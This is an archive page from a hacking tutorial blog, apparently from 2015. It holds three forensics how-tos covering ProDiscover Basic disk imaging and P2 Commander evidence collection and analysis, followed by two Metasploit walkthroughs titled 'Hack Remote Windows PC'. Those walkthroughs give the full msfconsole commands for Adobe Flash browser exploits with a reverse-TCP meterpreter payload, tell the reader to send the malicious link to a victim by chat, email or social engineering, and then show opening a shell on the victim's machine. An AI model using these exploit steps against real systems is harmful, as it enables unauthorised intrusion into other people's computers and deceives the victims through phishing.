Hacking Articles|Raj Chandel's Blog

How to gather Forensics Investigation Evidence using ProDiscover Basic

at 12:56 AM Tuesday, May 19, 2015 0 comments

The ARC Group ProDiscover® Basic edition is a self-managed tool for the examination of your hard disk security. ProDiscover Basic is designed to operate under the National Institute of Standards’ Disk Imaging Tool Specification 3.1.6 to collect snapshots of activities that are critical to taking proactive steps in protecting your data.

ProDiscover Basic has a built-in reporting tool to present findings as evidence for legal proceedings. You gather time zone data, drive information, Internet activity, and more, piece by piece, or in a full report as needed. You have robust search capabilities for capturing unique data, filenames and filetypes, data patterns, date ranges, etc. ProDiscover Basic gives clients the autonomy they desire in managing their own data security.

At the ARC Group, we provide the tools you need to identify security issues before they escalate, and we use ProDiscover solutions to maintain your corporate safety and preserve your data. With ProDiscover Basic, professional consultants, system administrators, and investigators take the upper hand to manage cyber security at every level and protect information in the case of impending legal actions.

First Download the ProDiscover Basic from here and install it in pc and enter the Project Number, Project File Name and Description in prodiscover basic software. Click on Open.

In main window click on Capture & Add Image

Now select the source drive that we want to capture, this could be a USB Drive or physical Drive.In my case I select drive Physical Drive 1 which is my USB drive.

Now set the destination of the image file where we want to store it, in my case I used E: drive and named the image folder as pd and the name of the image which is to be saved in desired folder is PD.EVE .

Now enter the ‘Technician Name’, ‘Image Number’ and ‘description’ Now Click on ok.

After finishing the following steps, windows will appear.

After imaging the drive close the prodiscover program then it will ask you to save your project.

Now starts prodiscover program again and click on open project and browser your project image select it and click open

Now the project will open & go to the left menu and click on Content View. Then it will show you all the contents of evidence image.

To generate the automatic report click on report tab under the view menu. Then it will show you Evidence Report.

How to study Forensics Evidence of PC using P2 Commander (Part 1)

at 3:26 AM Monday, May 18, 2015 0 comments

Now we are studying about the forensic evidence which we have collected in the previous article.

If you are interested to see the collection of forensic evidence, please click on the below link.

http://www.hackingarticles.in/how-to-collect-forensics-evidence-of-pc-using-p2-commander-part-1/

First of all, we will look into the Trash folder (which contains the files and folders deleted by the user but not erased permanently from system yet).

By clicking on Trash folder, it will show us the different files and folders with their Creation Time, Last Access Time, Last Change Time, and File Size.

Now click on Advanced Registry and System Analyzer and then Auto Run Option.

Go to Run option. It will Show all the programs that can run automatically at the time of booting of the system.

Now Select OS Info option. Through OS Info, we can see the Root Path, Current Version, Registered User, Product ID, Edition ID, and Installation Type.

Now select Uninstall Option from Programs Option. By Uninstall Option, we can see all the programs which are installed in the system.

To see the running services in the system, select Services option.

Now click on Known DLLs to see the Dynamic Link Libraries ( which contains data and code that are used by different programs simultaneously.)

Now to get the information about the removable disks used recently or in the past, first click on USB Storage and then select USBSTOR. It will show the name of the Disks.

Now Select any one of the disk and it will show us the size as well as the manufacturer name.

To see the history of most recently used commands from the Run command on the Start menu click on Users Info Option. Select a user; in my case we are selecting Raj. Now click on RunMRU.

To see the user-based web activities, click on the TypedURLs ,which will show the recently visited web sites.

Author: Mukul Mohan is a Microsoft Certified system engineer in security and messaging .He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Technical Training experience you can contact him at mukul@ignitetechnologies.in

How to Collect Forensics Evidence of PC using P2 Commander (Part 1)

at 12:28 AM Saturday, May 16, 2015 0 comments

P2C is a comprehensive digital investigation tool with over ten years of court-approved use by forensic examiners. An integrated database and true multi-threading mean faster processing. P2C was built on Paraben's trusted email examination tools for unparalleled network email and personal email archive analysis. Advanced features like Data Triage analysis, Xbox analysis, pornography detection.

First Download the p2 commander from here and install in victim pc and open p2 commander Click New Case the ‘Create a New Case’ page will open

Then click on next to proceed to next step.

Here in next step you have to enter the case name and DEMO details and click on finish to proceed to next step

Here in next step you have to enter the Investigator name and email details and click on finish to proceed to next step

Now Click ‘Add Evidence’->Choose ‘Image File’

Now select Auto-detect Image option from source type which will add the image evidence in any format. You can choose any option from different available options such as Drive Image or Fat Partition Image.

Now load the Evidence Disk Image

How to create Disk Image read this article

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

After selecting the evidence Image, click on Open.

Now you will see the case Demo is created, which will show you the hierarchy of the directories of the evidence image.

Now you can click on any one of the directories of the evidence image and it will show you all the containing files and sub folders within that folder describing their file name, file type, file size, creation time and last modification etc.

Now click on generate report tab.

Select the report type which is to be generated. In my case I am selecting HTML Investigative Report & select the destination folder. Then click on next.

Now select the sorted file which is to be added by clicking on Add and Export button with their file types. Now click on next to proceed further.

Now click on Finish to proceed to next step.

The report file will be saved on your destination folder. Now you will visualize the details of your report.

Hack Remote Windows PC using Adobe Flash Player domainMemory ByteArray Use After Free

at 8:43 PM Friday, May 15, 2015 0 comments

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Exploit Targets

Flash 17.0.0.134

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_domain_memory_uaf

msf exploit (adobe_flash_domain_memory_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_domain_memory_uaf)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_domain_memory_uaf)>set srvhost 192.168.1.7

msf exploit (adobe_flash_domain_memory_uaf)>set uripath /

msf exploit (adobe_flash_domain_memory_uaf)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.7:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Remote Windows PC using Adobe Flash Player NetConnection Type Confusion

at 11:30 AM 0 comments

This module exploits type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.

Exploit Targets

Flash 16.0.0.305

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_net_connection_confusion

msf exploit (adobe_flash_net_connection_confusion)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_net_connection_confusion)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_net_connection_confusion)>set srvhost 192.168.1.7

msf exploit (adobe_flash_net_connection_confusion)>set uripath /

msf exploit (adobe_flash_net_connection_confusion)>exploit